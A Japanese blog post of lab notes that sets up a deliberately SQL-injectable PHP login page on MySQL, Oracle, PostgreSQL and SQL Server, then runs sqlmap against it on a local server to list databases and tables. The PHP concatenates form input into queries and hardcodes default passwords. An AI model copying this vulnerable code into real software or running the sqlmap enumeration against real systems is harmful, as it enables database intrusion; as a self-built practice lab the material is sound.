PHP+Apache+sqlmap - HTN20190109の日記

<html>
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
パスワード<input type="text" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>

vim sql_injection.php

<?php
session_start();
header('Content-Type: text/html; charset=UTF-8');
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
$con = mysqli_connect('localhost', 'root', 'password', 'test');
$sql = "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'";
$rs = mysqli_query($con, $sql);
?>
<html>
<body>
<?php
if (mysqli_num_rows($rs) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
mysqli_close($con);
?>
</body>
</html>

/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php

http://192.168.137.66/sql_injection.html

-- 4. sqlmapインストール
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap

-- 5. 動作確認

python sqlmap.py --help

python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2"

python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2" --dbs

python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables

Oracle

(19c)

https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://nodachisoft.com/common/jp/article/jp000046/
https://www.php.net/manual/ja/function.oci-fetch-row.php

前提：
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み

-- 1. phpインストール

yum -y install epel-release
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm

yum repolist all

yum -y search php74
yum -y install php74 php74-php php74-php-pear php74-php-devel php74-php-cli

※↓ エラー「Cannot find sys/sdt.h which is required for DTrace support」回避のため追加インストール
yum -y install systemtap systemtap-runtime systemtap-sdt-devel

-- 2. Oracle Instant Clientインストール

yum -y install https://download.oracle.com/otn_software/linux/instantclient/1917000/oracle-instantclient19.17-basic-19.17.0.0.0-1.x86_64.rpm

yum -y install https://download.oracle.com/otn_software/linux/instantclient/1917000/oracle-instantclient19.17-devel-19.17.0.0.0-1.x86_64.rpm

-- 3. OCI8インストール

wget https://pecl.php.net/get/oci8-2.2.0.tgz

echo "extension=oci8.so" > /etc/opt/remi/php74/php.d/90_oci8.ini

export PHP_DTRACE=yes

C_INCLUDE_PATH=/usr/lib/oracle/19.17/client64 /opt/remi/php74/root/usr/bin/pecl install oci8-2.2.0.tgz

php74 -i | grep OCI

-- 4. Apacheインストール

yum -y install httpd

systemctl enable httpd
systemctl restart httpd
systemctl status httpd

echo '<?php phpinfo(); ?>' > /var/www/html/info.php

http://192.168.137.65/info.php

-- 5. 攻撃対象サイト作成

su - oracle
sqlplus test/test@localhost:1521/pdb1.example.com

drop table users purge;
create table users(name varchar2(30) ,pwd varchar2(30) );

insert into users values('admin','admin');
commit;

select * from users;

exit

cd /var/www/html

vim sql_injection.html

vim sql_injection.php

<?php
session_start();
header('Content-Type: text/html; charset=UTF-8');
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
$con = oci_connect('test', 'test', 'localhost:1521/pdb1.example.com');
$stid = oci_parse($con, "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'");
oci_execute($stid);
?>
<html>
<body>
<?php
if (oci_fetch_row($stid) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
oci_close($con);
?>
</body>
</html>

/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php

http://192.168.137.65/sql_injection.html

-- 6. sqlmapインストール
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap

-- 7. 動作確認

python sqlmap.py --help

python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2"

python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2" --dbs

python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables

PostgreSQL

(15)

https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://www.server-world.info/query?os=Rocky_Linux_8&p=httpd&f=6

前提：
攻撃元と攻撃先は同一サーバ (OS: RL8)
DB作成済み

-- 1. phpインストール

dnf -y install https://rpms.remirepo.net/enterprise/remi-release-8.rpm
dnf repolist all

dnf -y search php74
dnf -y install php74 php74-php php74-php-pgsql

php74 -i | grep pgsql

-- 2. Apacheインストール

dnf -y install httpd php-fpm

systemctl enable httpd php-fpm
systemctl restart httpd php-fpm
systemctl status httpd php-fpm

echo '<?php phpinfo(); ?>' > /var/www/html/info.php

http://192.168.137.55/info.php

-- 3. 攻撃対象サイト作成

su - postgres
psql test

drop table users;
create table users(name varchar(30) ,pwd varchar(30) );

insert into users values('admin','admin');

select * from users;

alter user postgres with password 'postgres';
\q

PGPASSWORD=postgres psql -h localhost -d test -U postgres
\q

exit

cd /var/www/html

vim sql_injection.html

vim sql_injection.php

<?php
session_start();
header('Content-Type: text/html; charset=UTF-8');
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
$con = pg_connect("host=localhost dbname=test user=postgres password=postgres");
$sql = "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'";
$rs = pg_query($con, $sql);
?>
<html>
<body>
<?php
if (pg_num_rows($rs) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
pg_close($con);
?>
</body>
</html>

/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php

http://192.168.137.55/sql_injection.html

-- 4. sqlmapインストール
dnf -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap

-- 5. 動作確認

python3 sqlmap.py --help

python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2"

python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2" --dbs

python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2" --tables

SQL Server

(2019)

https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://stackoverflow.com/questions/31569675/pdo-equivalent-of-mysql-num-rows-or-mssql-num-rows

前提：
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み

-- 1. phpインストール

yum -y install epel-release
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm

yum repolist all

yum -y search php74
yum -y install php74 php74-php php74-php-sqlsrv

php74 -i | grep PDO

-- 2. Apacheインストール

yum -y install httpd

systemctl enable httpd
systemctl restart httpd
systemctl status httpd

echo '<?php phpinfo(); ?>' > /var/www/html/info.php

http://192.168.137.127/info.php

-- 3. 攻撃対象サイト作成

sqlcmd -S localhost -U SA -P 'password'

use test

drop table users;
create table users(name varchar(30) ,pwd varchar(30) );

insert into users values('admin','admin');

select * from users;
go

quit

cd /var/www/html

vim sql_injection.html

vim sql_injection.php

<?php
session_start();
header('Content-Type: text/html; charset=UTF-8');
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];

$user = 'SA';
$pass = 'password';
$host = 'localhost';
$port = 1433;
$dbname = 'test';
$dsn = "sqlsrv:server=$host,$port;database=$dbname";
$con = new PDO($dsn, $user, $pass);
$pst = $con->query("SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'");
$result = $pst->fetchAll(PDO::FETCH_ASSOC);
?>
<html>
<body>
<?php
if (count($result) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
$con = null;
?>
</body>
</html>

/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php

http://192.168.137.127/sql_injection.html

-- 4. sqlmapインストール
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap

-- 5. 動作確認

python sqlmap.py --help

python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2"

python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2" --dbs

python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables